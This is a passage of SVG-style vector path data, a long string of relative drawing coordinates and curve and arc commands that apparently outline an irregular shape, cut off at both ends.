.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,